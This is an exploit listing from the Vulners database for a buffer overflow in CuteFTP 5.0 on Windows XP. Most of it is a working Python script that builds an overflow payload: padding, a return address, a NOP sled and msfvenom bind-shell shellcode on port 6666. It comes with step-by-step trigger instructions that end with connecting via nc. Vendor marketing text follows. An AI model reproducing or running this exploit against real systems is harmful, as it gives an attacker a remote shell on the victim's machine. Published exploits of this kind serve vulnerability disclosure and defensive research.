Vulners
Lucene search
CuteFTP 5.0 - Buffer Overflow
# Exploit Title: CuteFTP 5.0 - Buffer Overflow
# Author: Matteo Malvica
# Date: 2018-08-26
# Vendor homepage: www.globalscape.com
# Software: CuteFTP 5.0.4 XP - build 54.8.6.1
# Software Link: http://installer.globalscape.com/pub/cuteftp/archive/english/cuteftp50.exe
# Tested on: Windows XP Profesional SP3 English x86
# STEPS:
# 1. The python script will generate an 'exploit.txt' file.
# 2. Start CuteFTP
# 3. In the program menu click "File" > "Site Manager" > "New" and paste the content of
# the exploit file into the 'label' field and provide a dummy IP addresss.
# 4. Right click on the site name and 'create shortcut'
# 5. Rename the shortcut to whatever name you prefer: this will create an exe that automates exploit loading upon clicking.
# 6. Quit CuteFTP and launch the newly created 'shortcut'.exe
# 7. $ nc [target_ip] 6666
# 8. celebrate moderately
ret="\xD8\xFC\x91\x7C" #ntdll.dll 7C91FCD8
nops = '\x90'*30
#msfvenom -p windows/shell_bind_tcp LPORT=6666 -b '\x0a\x00\x0d' -f python
sc = ""
sc += "\xdb\xd8\xb8\xa7\x37\x29\x0e\xd9\x74\x24\xf4\x5b\x33"
sc += "\xc9\xb1\x53\x31\x43\x17\x83\xeb\xfc\x03\xe4\x24\xcb"
sc += "\xfb\x16\xa2\x89\x04\xe6\x33\xee\x8d\x03\x02\x2e\xe9"
sc += "\x40\x35\x9e\x79\x04\xba\x55\x2f\xbc\x49\x1b\xf8\xb3"
sc += "\xfa\x96\xde\xfa\xfb\x8b\x23\x9d\x7f\xd6\x77\x7d\x41"
sc += "\x19\x8a\x7c\x86\x44\x67\x2c\x5f\x02\xda\xc0\xd4\x5e"
sc += "\xe7\x6b\xa6\x4f\x6f\x88\x7f\x71\x5e\x1f\x0b\x28\x40"
sc += "\x9e\xd8\x40\xc9\xb8\x3d\x6c\x83\x33\xf5\x1a\x12\x95"
sc += "\xc7\xe3\xb9\xd8\xe7\x11\xc3\x1d\xcf\xc9\xb6\x57\x33"
sc += "\x77\xc1\xac\x49\xa3\x44\x36\xe9\x20\xfe\x92\x0b\xe4"
sc += "\x99\x51\x07\x41\xed\x3d\x04\x54\x22\x36\x30\xdd\xc5"
sc += "\x98\xb0\xa5\xe1\x3c\x98\x7e\x8b\x65\x44\xd0\xb4\x75"
sc += "\x27\x8d\x10\xfe\xca\xda\x28\x5d\x83\x2f\x01\x5d\x53"
sc += "\x38\x12\x2e\x61\xe7\x88\xb8\xc9\x60\x17\x3f\x2d\x5b"
sc += "\xef\xaf\xd0\x64\x10\xe6\x16\x30\x40\x90\xbf\x39\x0b"
sc += "\x60\x3f\xec\xa6\x68\xe6\x5f\xd5\x95\x58\x30\x59\x35"
sc += "\x31\x5a\x56\x6a\x21\x65\xbc\x03\xca\x98\x3f\x31\x01"
sc += "\x14\xd9\x2f\x05\x70\x71\xc7\xe7\xa7\x4a\x70\x17\x82"
sc += "\xe2\x16\x50\xc4\x35\x19\x61\xc2\x11\x8d\xea\x01\xa6"
sc += "\xac\xec\x0f\x8e\xb9\x7b\xc5\x5f\x88\x1a\xda\x75\x7a"
sc += "\xbe\x49\x12\x7a\xc9\x71\x8d\x2d\x9e\x44\xc4\xbb\x32"
sc += "\xfe\x7e\xd9\xce\x66\xb8\x59\x15\x5b\x47\x60\xd8\xe7"
sc += "\x63\x72\x24\xe7\x2f\x26\xf8\xbe\xf9\x90\xbe\x68\x48"
sc += "\x4a\x69\xc6\x02\x1a\xec\x24\x95\x5c\xf1\x60\x63\x80"
sc += "\x40\xdd\x32\xbf\x6d\x89\xb2\xb8\x93\x29\x3c\x13\x10"
sc += "\x59\x77\x39\x31\xf2\xde\xa8\x03\x9f\xe0\x07\x47\xa6"
sc += "\x62\xad\x38\x5d\x7a\xc4\x3d\x19\x3c\x35\x4c\x32\xa9"
sc += "\x39\xe3\x33\xf8"
buffer = "A" * 520+ ret + nops + sc + "C" * (3572 - len(sc))
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s recreational bytes..." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Aug 2018 00:00Current
7.4High risk
Vulners AI Score7.4